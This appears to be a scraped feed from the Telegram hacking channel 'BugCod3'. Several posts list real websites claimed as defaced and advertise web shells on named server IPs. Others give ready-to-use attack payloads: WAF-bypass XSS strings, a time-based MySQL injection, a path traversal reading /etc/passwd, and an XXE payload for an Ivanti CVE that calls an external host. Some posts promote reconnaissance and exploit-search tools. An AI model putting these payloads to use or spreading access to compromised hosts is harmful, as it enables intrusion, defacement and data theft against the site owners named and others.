http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
PHP: 8.2.15
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤🔥1🔥1😢1
Bypass Cloudflare WAF (XSS without parentheses)
#xss #bugbountytips #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
javanoscript:var{a:onerror}={a:alert};throw%20document.domain#xss #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
Akamai WAF (new, requires a click to pop)
Vector PoC
#XSS #Bypass
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
Vector PoC
#XSS #Bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
The useful exploit finder
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
pip install -r requirements.txt
python sicat.py --help
From keyword:
python sicat -k telerik --exploitdb --msfmodule
From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm
BugCod3#Exploit #Metasploit #Finder
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1🔥1🐳1
,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW
MySQL
#bugbountytip #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👎2⚡1🔥1
https://apsgevents.com/
https://giftimprint.com/
http://kulibangunan.giftimprint.com/
https://mail.giftimprint.com/
https://redstarfilms.net/
https://mail.redstarfilms.net/
https://tropicanarestaurants.com/
https://mail.tropicanarestaurants.com/
bugcod3Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥2❤1👍1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#bugbountytips #bugbounty
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
javanoscript:var{a:onerror}={a:alert};throw%20document.domain#bugbountytips #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1
Command Injection Payload List
⬇️ Download
#Payload #Command #Injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Payload #Command #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target
waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)cd xnLinkFinder
sudo python setup.py install
python xnLinkFinder.py --help
#specific target
python3 xnLinkFinder.py -i target.com -sf target.com
#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com
BugCod3#Python #Discover #Endpoints
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3⚡2🔥2❤1
NetProbe: Network Probe
💬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)
🔼 Installation:
💻 Usage:
📂 Example:
😸 Github
⬇️ Download
🔒
#Python #Network #Scanner #Vulnerability #Tools
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
cd NetProbe
pip install -r requirements.txt
python3 netprobe.py —help
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
BugCod3#Python #Network #Scanner #Vulnerability #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤3🔥1
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2🔥1
PHP: 8.1.27
Safe Mode: OFF
ServerIP: 213.158.95.90 [🇮🇹 ]
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
🔗 Link
Enjoy...⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 213.158.95.90 [
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
Enjoy...
#Shell
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤1👍1🔥1
I found a url like this :
encoded javanoscript:alert("Xss by vikas") to base64 like :
Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`
📘 Twitter
#bugbounty #xss #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
https://domain.io/redirect?url=some_base_64_encoded_stringencoded javanoscript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`
#bugbounty #xss #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥2⚡1🤣1
ALWAYS test 404 Not Found in Bug Bounties!
🔗 Medium
🔗 Freedium
#Writeup
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Writeup
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡1👍1🔥1
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"#bugbountytips #bugbounty #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥2❤🔥1⚡1
CVE-2024-22024
XXE on Ivanti Connect Secure
☠️ payload encoded base64:
send it to:
#bugbountytips #cve #Ivanti
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
XXE on Ivanti Connect Secure
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm#bugbountytips #cve #Ivanti
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤2🔥1
JSON Smuggling: A far-fetched intrusion detection evasion technique
🔗 Medium
#infosec #cybersecurity #blueteam
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#infosec #cybersecurity #blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1